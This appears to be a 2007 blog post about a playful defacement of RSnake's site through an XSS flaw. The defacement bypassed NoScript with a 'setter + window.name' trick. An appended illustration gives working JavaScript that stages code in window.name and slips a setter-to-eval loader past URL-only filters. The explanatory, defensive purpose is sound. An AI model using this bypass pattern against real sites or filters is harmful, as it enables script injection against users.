Archive for November 5th, 2007

So I just came back from my honeymoon trip (Greece, Turkey and Croatia), just in time to find that Sirdarckcat and Kuza55 had teamed up to throw a friendly defacement at our beloved RSnake!

The kids failed miserably; nevertheless, RSnake did not like it one bit.
Their payload was playful rather than venomous in my opinion, but you can judge for yourself:

0wning RSnake For Fun and PageRank

So, you're sitting on the sla.ckers.org irc channel one day and someone is poking around with one of RSnake's tools, and finds that it's not working, or at least that's what it seems like until they realise that it's not just broken, it's broken in a fun XSS way :) - what do you do? Do you:

a) Urge the person to report the problem to the vendor (RSnake), and get mad props for being awesome?
b) Scream about how the vendor is a security "expert" and needs to "secure their shit!!!1111"?
c) 0wn the vendor for Fun and PageRank

Well, to me, the answer seemed fairly obvious. Since the "Evil Advertising Empire" (Google), cue ominous music....now, had done a little dance and increased the PageRank of our blogs, we had gotten a taste of the power which we could amass, muahahaha, and we wanted more! Or at least I did.....

So anyway, Hey RSnake :) Thanks for the free advertising space.

Anyway, credit goes to:
sirdarckcat for not only being generally awesome, but finding the actual exploit.
thornmaker for (inadvertently) providing us with a method to get our payload through NoScript (Javascript variable setters and window.name FTW!), so umm, hey thornmaker :)
Gareth Heyes for doing that awesome research on selective payloads using CSS, which were implemented in the exploit.
kuza55 for not really doing anything, but being in the right place at the right time and being able to get some free Googlejuice from things anyway :p
Oh, and, of course: XSS!

We now return you to your regularly unscheduled posting ;)
- kuza55 & sirdarckcat

P.S. Thanks for directing carja.ckers.org to 127.0.0.1 :)
P.S.2. Sorry .mario, NoScript is the new attack playground :P, we'll be back to php-ids ASAP.

At any rate, from my NoScript standpoint, nice setter+name bypass combo -- just send me an email next time, thanks ;)
The latest release already defeats it, but for those who have disabled automatic updates, it's time to get it...
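For readers who want to see what the "setter + window.name" combo credited above actually looks like structurally, here is an added illustration (written for this page, not code from the original post, from the defacement, or from NoScript). It simulates the pattern in Node, with `globalThis` standing in for the browser `window`: the real payload is staged in `window.name`, which survives navigation across origins, and the only thing that has to be reflected into the vulnerable page is a short loader that binds a setter to `eval` and triggers it by assignment. The `example.test` URL, the reflected `q` parameter, the loader string, the marker payload and the URL-only filter model are all constructed assumptions; what NoScript's injection checker matched in 2007, and how the fixed release handles it, is not stated on this page and is not claimed here.

```javascript
'use strict';

// Added illustration of the setter + window.name staging pattern (not code
// from the original post). `globalThis` stands in for the browser `window`.

// Attacker side (assumed attacker-controlled page): stage the real payload in
// window.name. In a browser this is `name = payload; location = victimUrl`;
// window.name survives that navigation, so the victim page sees the string.
function stageInWindowName(payload) {
  globalThis.name = payload;
  return globalThis.name;
}

// The only fragment that must be reflected into the vulnerable page: a setter
// on the global object bound to eval, then an assignment that fires it.
// `x = name` calls eval(name) indirectly (global scope), so the code that
// executes is the staged string, not anything present in the URL.
// (Assumed loader form; the exact 2007 syntax is not on the page.)
const LOADER = "Object.defineProperty(this,'x',{set:eval});x=name";

// Constructed vulnerable URL: a hypothetical endpoint reflecting `q` unescaped.
const VICTIM_URL =
  'https://example.test/tool?q=' +
  encodeURIComponent('<script>' + LOADER + '</script>');

// Minimal model of a filter that inspects only the request URL (constructed
// illustration, not NoScript's real logic): it can only match what is in the
// decoded URL, so anything carried in window.name is invisible to it.
function urlFilterSees(url, needle) {
  return decodeURIComponent(url).includes(needle);
}

// Victim side: execute the reflected loader as an injected <script> would, in
// global scope. Returns the marker the staged payload sets, for checking.
function runInjectedLoader(loader) {
  delete globalThis.executed;
  (0, eval)(loader); // indirect eval: global scope, so `x` and `name` are globals
  return globalThis.executed;
}

// Constructed payload: a harmless marker instead of a defacement.
const PAYLOAD = "globalThis.executed = 'payload from window.name ran'";

// End-to-end run: what executed, and what a URL-only inspection could see.
function demo() {
  stageInWindowName(PAYLOAD);
  return {
    executed: runInjectedLoader(LOADER),
    urlShowsLoader: urlFilterSees(VICTIM_URL, 'x=name'),
    urlShowsPayload: urlFilterSees(VICTIM_URL, PAYLOAD),
  };
}

console.log(demo());
```

Run it with `node` and compare the two booleans: the loader is visible in the URL, the payload that actually ran is not. That is the whole point of the combo, and the practical caveat for anyone writing a reflected-XSS filter or reviewing a page that reads `window.name`: a check limited to the URL sees a tiny, unremarkable loader, while the attacker-controlled `window.name` carries the real code and must be treated as untrusted input like any other.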
